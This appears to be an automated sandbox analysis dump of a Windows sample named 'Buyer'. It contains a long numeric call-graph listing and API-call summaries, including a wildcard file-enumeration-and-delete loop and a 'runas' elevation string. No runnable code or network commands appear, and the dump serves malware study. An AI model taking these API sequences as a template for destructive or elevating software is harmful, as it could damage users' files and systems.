106218->106219 106221 f85701 106219->106221 106223 f6015b 8 API calls 106221->106223 106222->106182 106224 f85734 106223->106224 106226 f48643 106225->106226 106228 f4864c __fread_nolock 106225->106228 106226->106228 106252 f4b159 106226->106252 106228->106175 106230 f4b159 8 API calls 106229->106230 106231 f43f07 106230->106231 106231->106176 106231->106194 106233 f4abf4 106232->106233 106234 f4ac01 106232->106234 106233->106177 106235 f6012b 8 API calls 106234->106235 106236 f4ac0b 106235->106236 106237 f6015b 8 API calls 106236->106237 106237->106233 106239 f47477 _wcslen 106238->106239 106240 f855fc 106238->106240 106243 f474b2 106239->106243 106244 f4748d 106239->106244 106241 f48635 8 API calls 106240->106241 106242 f85605 106241->106242 106242->106242 106245 f6012b 8 API calls 106243->106245 106258 f47851 8 API calls 106244->106258 106247 f474be 106245->106247 106249 f6015b 8 API calls 106247->106249 106248 f47495 __fread_nolock 106248->106191 106249->106248 106250->106191 106251->106222 106253 f4b16c 106252->106253 106254 f4b169 __fread_nolock 106252->106254 106255 f6012b 8 API calls 106253->106255 106254->106228 106256 f4b177 106255->106256 106257 f6015b 8 API calls 106256->106257 106257->106254 106258->106248 106260 f46b0a __fread_nolock 106259->106260 106261 f46ad6 106259->106261 106260->106205 106261->106260 106262 f8543a 106261->106262 106263 f46afd 106261->106263 106264 f6012b 8 API calls 106262->106264 106270 f46c63 106263->106270 106266 f85449 106264->106266 106267 f6015b 8 API calls 106266->106267 106268 f8547d __fread_nolock 106267->106268 106269->106206 106271 f46c79 106270->106271 106274 f46c74 __fread_nolock 106270->106274 106272 f85514 106271->106272 106273 f6015b 8 API calls 106271->106273 106273->106274 106274->106260 106276 f47e30 52 API calls 106275->106276 106277 fc8717 106276->106277 106301 fc875c ISource 106277->106301 106313 fc945a 106277->106313 106279 fc8a08 106280 fc8bd6 106279->106280 106284 fc8a16 106279->106284 106354 fc966b 59 
API calls 106280->106354 106283 fc8be5 106283->106284 106285 fc8bf1 106283->106285 106326 fc860d 106284->106326 106285->106301 106286 f47e30 52 API calls 106304 fc87d0 106286->106304 106291 fc8a4f 106340 f5ffc0 106291->106340 106294 fc8a6f 106347 fb3d0b 81 API calls __wsopen_s 106294->106347 106295 fc8a89 106348 f46d01 8 API calls 106295->106348 106298 fc8a98 106349 f47360 8 API calls 106298->106349 106299 fc8a7a GetCurrentProcess TerminateProcess 106299->106295 106301->105937 106302 fc8ab1 106311 fc8ad9 106302->106311 106350 f50b40 8 API calls 106302->106350 106304->106279 106304->106286 106304->106301 106345 fa4868 8 API calls __fread_nolock 106304->106345 106346 fc8ca4 41 API calls _strftime 106304->106346 106305 fc8c4c 106305->106301 106307 fc8c60 FreeLibrary 106305->106307 106306 fc8ac8 106351 fc9302 74 API calls 106306->106351 106307->106301 106311->106305 106352 f50b40 8 API calls 106311->106352 106353 f4a35b 8 API calls 106311->106353 106355 fc9302 74 API calls 106311->106355 106314 f4b159 8 API calls 106313->106314 106315 fc9475 CharLowerBuffW 106314->106315 106356 fa954d 106315->106356 106319 f4ae03 8 API calls 106320 fc94b1 106319->106320 106321 f47642 8 API calls 106320->106321 106322 fc94c5 106321->106322 106323 f48635 8 API calls 106322->106323 106325 fc94cf _wcslen 106323->106325 106324 fc95e5 _wcslen 106324->106304 106325->106324 106363 fc8ca4 41 API calls _strftime 106325->106363 106327 fc8628 106326->106327 106328 fc8673 106326->106328 106329 f6015b 8 API calls 106327->106329 106332 fc981d 106328->106332 106330 fc864a 106329->106330 106330->106328 106331 f6012b 8 API calls 106330->106331 106331->106330 106333 fc9a32 ISource 106332->106333 106338 fc9841 _strcat _wcslen ___std_exception_copy 106332->106338 106333->106291 106334 f4b81d 39 API calls 106334->106338 106335 f4b4cf 39 API calls 106335->106338 106336 f4b8eb 39 API calls 106336->106338 106337 f47e30 52 API calls 106337->106338 106338->106333 106338->106334 106338->106335 106338->106336 
106338->106337 106366 faf5ef 10 API calls _wcslen 106338->106366 106341 f5ffd5 106340->106341 106342 f6006d LoadLibraryExW 106341->106342 106343 f6005b FindCloseChangeNotification 106341->106343 106344 f6003b 106341->106344 106342->106344 106343->106344 106344->106294 106344->106295 106345->106304 106346->106304 106347->106299 106348->106298 106349->106302 106350->106306 106351->106311 106352->106311 106353->106311 106354->106283 106355->106311 106358 fa956d _wcslen 106356->106358 106357 fa965c 106357->106319 106357->106325 106358->106357 106359 fa9661 106358->106359 106360 fa95a2 106358->106360 106359->106357 106365 f5e224 41 API calls 106359->106365 106360->106357 106364 f5e224 41 API calls 106360->106364 106363->106324 106364->106360 106365->106359 106366->106338 106368 f6015b 8 API calls 106367->106368 106369 f5c0c2 106368->106369 106370 f6012b 8 API calls 106369->106370 106371 f5c0ce 106370->106371 106371->105948 106373 f5fb27 106372->106373 106374 f5faf0 106372->106374 106386 f5fe73 8 API calls 106373->106386 106376 f6015b 8 API calls 106374->106376 106377 f5faf7 WideCharToMultiByte 106376->106377 106385 f5fb30 8 API calls __fread_nolock 106377->106385 106379 f5fb1b 106379->105952 106380->105944 106381->105949 106383 f6012b 8 API calls 106382->106383 106384 f43978 106383->106384 106384->105959 106384->105960 106385->106379 106386->106379 106388 f439b4 ___scrt_fastfail 106387->106388 106410 f44dd2 106388->106410 106391 f43a3a 106393 f839c2 Shell_NotifyIconW 106391->106393 106394 f43a58 Shell_NotifyIconW 106391->106394 106414 f45033 106394->106414 106396 f43a6e 106396->105971 106398 f42f76 106397->106398 106399 f42f26 ___scrt_fastfail 106397->106399 106398->105971 106400 f42f45 Shell_NotifyIconW 106399->106400 106400->106398 106401->105971 106402->105971 106404 f6015b 8 API calls 106403->106404 106405 f469e9 106404->106405 106406 f6012b 8 API calls 106405->106406 106407 f469f7 106406->106407 106407->105971 106408->105971 106409->105971 106411 f43a09 
106410->106411 106412 f44dee 106410->106412 106411->106391 106444 face59 42 API calls _strftime 106411->106444 106412->106411 106413 f840d9 DestroyIcon 106412->106413 106413->106411 106415 f45050 106414->106415 106434 f45132 106414->106434 106416 f469c4 8 API calls 106415->106416 106417 f4505e 106416->106417 106418 f842ad LoadStringW 106417->106418 106419 f4506b 106417->106419 106422 f842c7 106418->106422 106420 f47467 8 API calls 106419->106420 106421 f45080 106420->106421 106423 f4508d 106421->106423 106424 f842e3 106421->106424 106426 f4ad69 8 API calls 106422->106426 106429 f450b3 ___scrt_fastfail 106422->106429 106423->106422 106425 f45097 106423->106425 106424->106429 106431 f84326 106424->106431 106433 f4ae03 8 API calls 106424->106433 106445 f459dc 106425->106445 106426->106429 106432 f45118 Shell_NotifyIconW 106429->106432 106430 f46aa4 8 API calls 106430->106429 106455 f5fe35 51 API calls 106431->106455 106432->106434 106435 f8430d 106433->106435 106434->106396 106454 faa08a 9 API calls 106435->106454 106438 f84345 106440 f459dc 8 API calls 106438->106440 106439 f84318 106441 f46aa4 8 API calls 106439->106441 106442 f84356 106440->106442 106441->106431 106443 f459dc 8 API calls 106442->106443 106443->106429 106444->106391 106446 f459f3 106445->106446 106447 f84816 106445->106447 106456 f45a04 106446->106456 106448 f6012b 8 API calls 106447->106448 106451 f84820 _wcslen 106448->106451 106450 f450a5 106450->106430 106452 f6015b 8 API calls 106451->106452 106453 f84859 __fread_nolock 106452->106453 106454->106439 106455->106438 106457 f45a14 _wcslen 106456->106457 106458 f84878 106457->106458 106459 f45a27 106457->106459 106461 f6012b 8 API calls 106458->106461 106460 f46c63 8 API calls 106459->106460 106462 f45a34 __fread_nolock 106460->106462 106463 f84882 106461->106463 106462->106450 106464 f6015b 8 API calls 106463->106464 106465 f848b2 __fread_nolock 106464->106465 106467 f4ae03 8 API calls 106466->106467 106468 fad9ad 106467->106468 106469 f4ae03 8 
API calls 106468->106469 106470 fad9b6 106469->106470 106471 f4ae03 8 API calls 106470->106471 106472 fad9bf 106471->106472 106490 f43ff7 106472->106490 106477 fad9e5 106479 f43e34 8 API calls 106477->106479 106478 f459dc 8 API calls 106478->106477 106480 fad9f9 FindFirstFileW 106479->106480 106481 fada85 FindClose 106480->106481 106484 fada18 106480->106484 106486 fada90 106481->106486 106482 fada60 FindNextFileW 106482->106484 106483 f4ad69 8 API calls 106483->106484 106484->106481 106484->106482 106484->106483 106485 f46aa4 8 API calls 106484->106485 106487 f459dc 8 API calls 106484->106487 106485->106484 106486->105986 106488 fada51 DeleteFileW 106487->106488 106488->106482 106489 fada7c FindClose 106488->106489 106489->106486 106502 f822a0 106490->106502 106493 f44023 106496 f47467 8 API calls 106493->106496 106494 f4403e 106495 f4abe7 8 API calls 106494->106495 106497 f4402f 106495->106497 106496->106497 106504 f4699d 106497->106504 106500 fae7da GetFileAttributesW 106501 fad9d3 106500->106501 106501->106477 106501->106478 106503 f44004 GetFullPathNameW 106502->106503 106503->106493 106503->106494 106505 f469ab 106504->106505 106506 f48635 8 API calls 106505->106506 106507 f4403b 106506->106507 106507->106500 106508->105997 106509->105999 106510->106003 106512 fb15e0 106511->106512 106513 f6012b 8 API calls 106512->106513 106514 fb15e7 106513->106514 106517 faf9df 106514->106517 106516 fb1621 106516->106014 106518 f4b159 8 API calls 106517->106518 106519 faf9f2 CharLowerBuffW 106518->106519 106525 fafa05 106519->106525 106520 fafa0f ___scrt_fastfail 106520->106516 106521 fafa43 106523 fafa55 106521->106523 106526 f453e8 8 API calls 106521->106526 106522 f453e8 8 API calls 106522->106525 106524 f6015b 8 API calls 106523->106524 106530 fafa83 106524->106530 106525->106520 106525->106521 106525->106522 106526->106523 106527 fafaa5 106535 fafb36 106527->106535 106530->106527 106550 faf917 8 API calls 106530->106550 106531 fafae2 106531->106520 106532 f6012b 8 API 
calls 106531->106532 106533 fafafc 106532->106533 106534 f6015b 8 API calls 106533->106534 106534->106520 106536 f4ae03 8 API calls 106535->106536 106537 fafb68 106536->106537 106538 f4ae03 8 API calls 106537->106538 106539 fafb71 106538->106539 106540 f4ae03 8 API calls 106539->106540 106546 fafb7a 106540->106546 106541 f47467 8 API calls 106541->106546 106542 f666d8 GetStringTypeW 106542->106546 106544 f66621 39 API calls 106544->106546 106545 fafb36 40 API calls 106545->106546 106546->106541 106546->106542 106546->106544 106546->106545 106547 fafe3e 106546->106547 106548 f49c50 8 API calls 106546->106548 106549 f4ad69 8 API calls 106546->106549 106551 f66702 GetStringTypeW _strftime 106546->106551 106547->106531 106548->106546 106549->106546 106550->106530 106551->106546 106552->106023 106553->106032 106554->106039 106555->106049 106556->106053 106557->105850 106558->105839 106559->105876 106560->105816 106561->105840 106562->105818 106563->105818 106564->105818 106565->105828 106566->105838 106567->105837 106568->105837 106570 f4b249 106569->106570 106574 f4b271 ISource 106569->106574 106571 f4b257 106570->106571 106572 f4b23b 8 API calls 106570->106572 106573 f4b25d 106571->106573 106575 f4b23b 8 API calls 106571->106575 106572->106571 106573->106574 106600 f4b670 8 API calls ISource 106573->106600 106574->105846 106575->106573 106577->105870 106578->105870 106601 f4be10 106579->106601 106581 f4ae45 106582 f8fd3d 106581->106582 106583 f4ae53 106581->106583 106610 f4a35b 8 API calls 106582->106610 106585 f6012b 8 API calls 106583->106585 106587 f4ae64 106585->106587 106586 f8fd48 106588 f4ae03 8 API calls 106587->106588 106589 f4ae6e 106588->106589 106590 f4ae7d 106589->106590 106591 f4ad69 8 API calls 106589->106591 106592 f6012b 8 API calls 106590->106592 106591->106590 106593 f4ae87 106592->106593 106609 f4ad0b 39 API calls 106593->106609 106595 f4aeab 106595->105870 106596->105818 106597->105870 106598->105820 106599->105818 106600->106574 106602 f4c057 
106601->106602 106607 f4be23 106601->106607 106602->106581 106604 f4ae03 8 API calls 106604->106607 106605 f4becd 106605->106581 106607->106604 106607->106605 106611 f60592 5 API calls __Init_thread_wait 106607->106611 106612 f603f3 29 API calls __onexit 106607->106612 106613 f60548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 106607->106613 106609->106595 106610->106586 106611->106607 106612->106607 106613->106607 106614->105886 106615->105886 106616->105892 106617->105887 106618->105721 106619->105713 106620->105716 106621->105716 106622 f511fc 106631 f51205 __fread_nolock 106622->106631 106623 f47e30 52 API calls 106623->106631 106624 f9646a 106643 fa115e 8 API calls __fread_nolock 106624->106643 106626 f96476 106630 f4ad69 8 API calls 106626->106630 106634 f50e0c ISource __fread_nolock 106626->106634 106627 f51256 106628 f46c63 8 API calls 106627->106628 106628->106634 106629 f6012b 8 API calls 106629->106631 106630->106634 106631->106623 106631->106624 106631->106627 106631->106629 106632 f9648f 106631->106632 106633 f6015b 8 API calls 106631->106633 106631->106634 106633->106631 106637 f965f2 106634->106637 106638 f967be 106634->106638 106640 f513b2 106634->106640 106642 f50e97 106634->106642 106645 f5e1db 8 API calls ISource 106634->106645 106644 f6d2b5 39 API calls 106637->106644 106638->106642 106646 f6d2b5 39 API calls 106638->106646 106640->106642 106647 f5bcc1 39 API calls 106640->106647 106643->106626 106644->106637 106645->106634 106646->106642 106647->106642 106960 f92dd0 106975 f4dd50 ISource 106960->106975 106961 f4e0b1 PeekMessageW 106961->106975 106962 f4dda7 GetInputState 106962->106961 106962->106975 106964 f92254 TranslateAcceleratorW 106964->106975 106965 f4e12f PeekMessageW 106965->106975 106966 f4e113 TranslateMessage DispatchMessageW 106966->106965 106967 f4dfa4 timeGetTime 106967->106975 106968 f4e14f Sleep 106990 f4e160 106968->106990 106969 f9310a Sleep 106969->106990 106970 f5ef0e timeGetTime 106970->106990 106971 
f92370 timeGetTime 107027 f5a921 9 API calls 106971->107027 106973 fadac1 46 API calls 106973->106990 106974 f931a1 GetExitCodeProcess 106976 f931cd CloseHandle 106974->106976 106977 f931b7 WaitForSingleObject 106974->106977 106975->106961 106975->106962 106975->106964 106975->106965 106975->106966 106975->106967 106975->106968 106975->106969 106975->106971 106980 f4df75 106975->106980 106987 f4f1e0 217 API calls 106975->106987 106988 f519c0 217 API calls 106975->106988 106989 f4c210 217 API calls 106975->106989 106992 f4e2f0 106975->106992 106999 f4e570 106975->106999 107022 f5f3b7 106975->107022 107028 fb4199 8 API calls 106975->107028 107029 fb3d0b 81 API calls __wsopen_s 106975->107029 106976->106990 106977->106975 106977->106976 106978 f92fc7 106978->106980 106979 fd317d GetForegroundWindow 106979->106990 106982 f9323f Sleep 106982->106975 106987->106975 106988->106975 106989->106975 106990->106970 106990->106973 106990->106974 106990->106975 106990->106978 106990->106979 106990->106980 106990->106982 107030 fc5ddf 8 API calls 106990->107030 107031 faefbc QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 106990->107031 106993 f4e323 106992->106993 106994 f4e30f 106992->106994 107064 fb3d0b 81 API calls __wsopen_s 106993->107064 107032 f4d7f0 106994->107032 106996 f4e31a 106996->106975 106998 f9350b 106998->106998 107000 f4e5b0 106999->107000 107019 f4e67c ISource 107000->107019 107081 f60592 5 API calls __Init_thread_wait 107000->107081 107003 f93560 107005 f4ae03 8 API calls 107003->107005 107003->107019 107004 f4ae03 8 API calls 107004->107019 107006 f9357a 107005->107006 107082 f603f3 29 API calls __onexit 107006->107082 107007 f4acbd 39 API calls 107007->107019 107010 f93584 107083 f60548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 107010->107083 107012 fb3d0b 81 API calls 107012->107019 107014 f4ad69 8 API calls 107014->107019 107015 f4f1e0 217 API calls 107015->107019 107016 f4e981 107016->106975 
107019->107004 107019->107007 107019->107012 107019->107014 107019->107015 107019->107016 107021 f50b40 8 API calls 107019->107021 107080 f5b215 217 API calls 107019->107080 107084 f60592 5 API calls __Init_thread_wait 107019->107084 107085 f603f3 29 API calls __onexit 107019->107085 107086 f60548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 107019->107086 107087 fc4f5b 217 API calls 107019->107087 107088 fc7048 217 API calls 107019->107088 107021->107019 107024 f5f3ca 107022->107024 107026 f5f3d3 107022->107026 107023 f5f3f7 IsDialogMessageW 107023->107024 107023->107026 107024->106975 107025 f9f895 GetClassLongW 107025->107023 107025->107026 107026->107023 107026->107024 107026->107025 107027->106975 107028->106975 107029->106975 107030->106990 107031->106990 107033 f4f1e0 217 API calls 107032->107033 107053 f4d82d 107033->107053 107034 f9215a 107078 fb3d0b 81 API calls __wsopen_s 107034->107078 107036 f4d89b ISource 107036->106996 107037 f4dc65 107037->107036 107048 f6015b 8 API calls 107037->107048 107038 f4d953 107038->107037 107040 f4d95e 107038->107040 107039 f4db8f 107041 f4dba4 107039->107041 107042 f9214b 107039->107042 107044 f6012b 8 API calls 107040->107044 107045 f6012b 8 API calls 107041->107045 107077 fc5e8c 8 API calls 107042->107077 107043 f4da48 107049 f6015b 8 API calls 107043->107049 107051 f4d965 __fread_nolock 107044->107051 107056 f4d9fa 107045->107056 107047 f6012b 8 API calls 107047->107053 107048->107051 107059 f4d9b9 ISource __fread_nolock 107049->107059 107050 f6012b 8 API calls 107052 f4d986 107050->107052 107051->107050 107051->107052 107052->107059 107065 f4c0f0 107052->107065 107053->107034 107053->107036 107053->107037 107053->107038 107053->107043 107053->107047 107053->107059 107055 f9213a 107076 fb3d0b 81 API calls __wsopen_s 107055->107076 107056->106996 107059->107039 107059->107055 107059->107056 107060 f92115 107059->107060 107062 f920f3 107059->107062 107073 f41c48 217 API calls 107059->107073 107075 fb3d0b 
81 API calls __wsopen_s 107060->107075 107074 fb3d0b 81 API calls __wsopen_s 107062->107074 107064->106998 107066 f4c156 107065->107066 107067 f4c12a 107065->107067 107069 f4f1e0 217 API calls 107066->107069 107068 f4e570 217 API calls 107067->107068 107071 f4c130 107068->107071 107070 f907d2 107069->107070 107070->107071 107079 fb3d0b 81 API calls __wsopen_s 107070->107079 107071->107059 107073->107059 107074->107056 107075->107056 107076->107056 107077->107034 107078->107036 107079->107071 107080->107019 107081->107003 107082->107010 107083->107019 107084->107019 107085->107019 107086->107019 107087->107019 107088->107019 107089 f4fd5f 107090 f4fd73 107089->107090 107096 f502c5 107089->107096 107091 f4fd85 107090->107091 107094 f6012b 8 API calls 107090->107094 107092 f945b3 107091->107092 107095 f4fdde 107091->107095 107124 f4a35b 8 API calls 107091->107124 107127 fb183e 8 API calls 107092->107127 107094->107091 107098 f519c0 217 API calls 107095->107098 107115 f4f33d ISource 107095->107115 107096->107091 107099 f4ad69 8 API calls 107096->107099 107122 f4f216 ISource 107098->107122 107099->107091 107100 f952b2 107131 fb3d0b 81 API calls __wsopen_s 107100->107131 107101 f6012b 8 API calls 107101->107122 107102 f50cf0 40 API calls 107102->107122 107103 f50535 107108 f4ad69 8 API calls 107103->107108 107103->107115 107105 f951e1 107130 fb3d0b 81 API calls __wsopen_s 107105->107130 107106 f94c62 107112 f4ad69 8 API calls 107106->107112 107106->107115 107108->107115 107110 f60592 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 107110->107122 107111 f4ad69 8 API calls 107111->107122 107112->107115 107113 f50830 217 API calls 107113->107122 107114 f4ae03 8 API calls 107114->107122 107116 f603f3 29 API calls pre_c_initialization 107116->107122 107118 f9509c 107128 fb3d0b 81 API calls __wsopen_s 107118->107128 107120 f4f94e ISource 107129 fb3d0b 81 API calls __wsopen_s 107120->107129 107122->107100 107122->107101 
107122->107102 107122->107103 107122->107105 107122->107106 107122->107110 107122->107111 107122->107113 107122->107114 107122->107115 107122->107116 107122->107118 107122->107120 107123 f60548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 107122->107123 107125 fc7db9 53 API calls __wsopen_s 107122->107125 107126 fc7ef8 65 API calls 107122->107126 107123->107122 107124->107091 107125->107122 107126->107122 107127->107115 107128->107120 107129->107115 107130->107115 107131->107115 106648 f42f78 106651 f42f92 106648->106651 106652 f42fa9 106651->106652 106653 f4300b 106652->106653 106654 f4300d 106652->106654 106655 f42fae 106652->106655 106656 f42ff2 DefWindowProcW 106653->106656 106657 f43013 106654->106657 106658 f83084 106654->106658 106659 f43087 PostQuitMessage 106655->106659 106660 f42fbb 106655->106660 106664 f42f8c 106656->106664 106665 f4303f SetTimer RegisterWindowMessageW 106657->106665 106666 f4301a 106657->106666 106706 f44286 10 API calls 106658->106706 106659->106664 106661 f42fc6 106660->106661 106662 f830f1 106660->106662 106667 f42fd0 106661->106667 106668 f43091 106661->106668 106709 fac631 65 API calls ___scrt_fastfail 106662->106709 106665->106664 106669 f43068 CreatePopupMenu 106665->106669 106672 f43023 KillTimer 106666->106672 106673 f83025 106666->106673 106674 f830d6 106667->106674 106675 f42fdb 106667->106675 106696 f5fc73 106668->106696 106669->106664 106671 f830a5 106707 f5f09a 40 API calls 106671->106707 106681 f42f14 Shell_NotifyIconW 106672->106681 106679 f8302a 106673->106679 106680 f83060 MoveWindow 106673->106680 106674->106656 106708 fa11b9 8 API calls 106674->106708 106682 f43075 106675->106682 106683 f42fe6 106675->106683 106676 f83103 106676->106656 106676->106664 106684 f8304f SetFocus 106679->106684 106685 f83030 106679->106685 106680->106664 106686 f43036 106681->106686 106704 f430a2 75 API calls ___scrt_fastfail 106682->106704 106683->106656 106693 f42f14 Shell_NotifyIconW 106683->106693 
106684->106664 106685->106683 106688 f83039 106685->106688 106703 f447a8 DeleteObject DestroyWindow 106686->106703 106705 f44286 10 API calls 106688->106705 106691 f43085 106691->106664 106694 f830ca 106693->106694 106695 f43989 60 API calls 106694->106695 106695->106653 106697 f5fd11 106696->106697 106698 f5fc8b ___scrt_fastfail 106696->106698 106697->106664 106699 f45033 55 API calls 106698->106699 106701 f5fcb2 106699->106701 106700 f5fcfa KillTimer SetTimer 106700->106697 106701->106700 106702 f9fbc2 Shell_NotifyIconW 106701->106702 106702->106700 106703->106664 106704->106691 106705->106664 106706->106671 106707->106683 106708->106653 106709->106676 107132 f41098 107137 f44e68 107132->107137 107136 f410a7 107138 f4ae03 8 API calls 107137->107138 107139 f44e7f GetVersionExW 107138->107139 107140 f47467 8 API calls 107139->107140 107141 f44ecc 107140->107141 107142 f48635 8 API calls 107141->107142 107145 f44f02 107141->107145 107143 f44ef6 107142->107143 107144 f4699d 8 API calls 107143->107144 107144->107145 107146 f44fa6 GetCurrentProcess IsWow64Process 107145->107146 107148 f84259 107145->107148 107147 f44fc2 107146->107147 107149 f8429e GetSystemInfo 107147->107149 107150 f44fda LoadLibraryA 107147->107150 107151 f45027 GetSystemInfo 107150->107151 107152 f44feb GetProcAddress 107150->107152 107153 f45001 107151->107153 107152->107151 107154 f44ffb GetNativeSystemInfo 107152->107154 107155 f45005 FreeLibrary 107153->107155 107156 f4109d 107153->107156 107154->107153 107155->107156 107157 f603f3 29 API calls __onexit 107156->107157 107157->107136 107158 f945d7 107169 f5e28e 107158->107169 107160 f945ed 107161 f94668 107160->107161 107178 f5a921 9 API calls 107160->107178 107163 f4c210 217 API calls 107161->107163 107165 f946b4 107163->107165 107167 f9515e 107165->107167 107180 fb3d0b 81 API calls __wsopen_s 107165->107180 107166 f94648 107166->107165 107179 fb21a8 8 API calls 107166->107179 107170 f5e29c 107169->107170 107171 f5e2af 107169->107171 107181 
f4a35b 8 API calls 107170->107181 107173 f5e2b4 107171->107173 107174 f5e2e2 107171->107174 107175 f6012b 8 API calls 107173->107175 107182 f4a35b 8 API calls 107174->107182 107177 f5e2a6 107175->107177 107177->107160 107178->107166 107179->107161 107180->107167 107181->107177 107182->107177 107183 f4105b 107188 f43ae4 107183->107188 107185 f4106a 107219 f603f3 29 API calls __onexit 107185->107219 107187 f41074 107189 f43af4 __wsopen_s 107188->107189 107190 f4ae03 8 API calls 107189->107190 107191 f43baa 107190->107191 107192 f43dd1 10 API calls 107191->107192 107193 f43bb3 107192->107193 107220 f43a75 107193->107220 107196 f459dc 8 API calls 107197 f43bcc 107196->107197 107226 f458dc 107197->107226 107200 f4ae03 8 API calls 107201 f43be4 107200->107201 107202 f4abe7 8 API calls 107201->107202 107203 f43bed RegOpenKeyExW 107202->107203 107204 f839cf RegQueryValueExW 107203->107204 107210 f43c0f 107203->107210 107205 f839ec 107204->107205 107206 f83a65 RegCloseKey 107204->107206 107207 f6015b 8 API calls 107205->107207 107206->107210 107218 f83a77 _wcslen 107206->107218 107208 f83a05 107207->107208 107209 f43966 8 API calls 107208->107209 107212 f83a10 RegQueryValueExW 107209->107212 107210->107185 107211 f453e8 8 API calls 107211->107218 107213 f83a2d 107212->107213 107215 f83a47 ISource 107212->107215 107214 f47467 8 API calls 107213->107214 107214->107215 107215->107206 107216 f4a1d4 8 API calls 107216->107218 107217 f458dc 8 API calls 107217->107218 107218->107210 107218->107211 107218->107216 107218->107217 107219->107187 107221 f822a0 __wsopen_s 107220->107221 107222 f43a82 GetFullPathNameW 107221->107222 107223 f43aa4 107222->107223 107224 f47467 8 API calls 107223->107224 107225 f43ac2 107224->107225 107225->107196 107227 f458eb 107226->107227 107231 f4590c __fread_nolock 107226->107231 107229 f6015b 8 API calls 107227->107229 107228 f6012b 8 API calls 107230 f43bdb 107228->107230 107229->107231 107230->107200 107231->107228 107232 f92f96 107247 f4dd50 

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00F44E97
                                                                                                      • Part of subcall function 00F47467: _wcslen.LIBCMT ref: 00F4747A
                                                                                                    • GetCurrentProcess.KERNEL32(?,00FDDB24,00000000,?,?), ref: 00F44FAD
                                                                                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 00F44FB4
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00F44FDF
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F44FF1
                                                                                                    • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00F44FFF
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 00F45006
                                                                                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 00F4502B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                    • API String ID: 3290436268-192647395
                                                                                                    • Opcode ID: 8c30a1337f01af02213457eb05127d9faaf3e5bcd56bcc25e5cf31928d6a26a5
                                                                                                    • Instruction ID: ae5f42d5c48bf08ab747dcfa743d6e42fc0f0e6a4cff26bdefc09661a19f79b5
                                                                                                    • Opcode Fuzzy Hash: 8c30a1337f01af02213457eb05127d9faaf3e5bcd56bcc25e5cf31928d6a26a5
                                                                                                    • Instruction Fuzzy Hash: BC91A63290E3D5CFDB36DB7874446D97FA5AB76314B24C89AE4C0A324ED22E5448EB31

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 00F43FF7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F43E0E,?,?,00F82A98,?,?,00000100,00000000,00000000,CMDLINE), ref: 00F44017
                                                                                                      • Part of subcall function 00FAE7DA: GetFileAttributesW.KERNEL32(?,00FAD57A), ref: 00FAE7DB
                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00FADA05
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00FADA55
                                                                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00FADA66
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00FADA7D
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00FADA86
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                    • String ID: \*.*
                                                                                                    • API String ID: 2649000838-1173974218

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F42853
                                                                                                      • Part of subcall function 00F43DD1: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00F82A98,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00F43DEF
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,?,?,01003204), ref: 00F82FC3
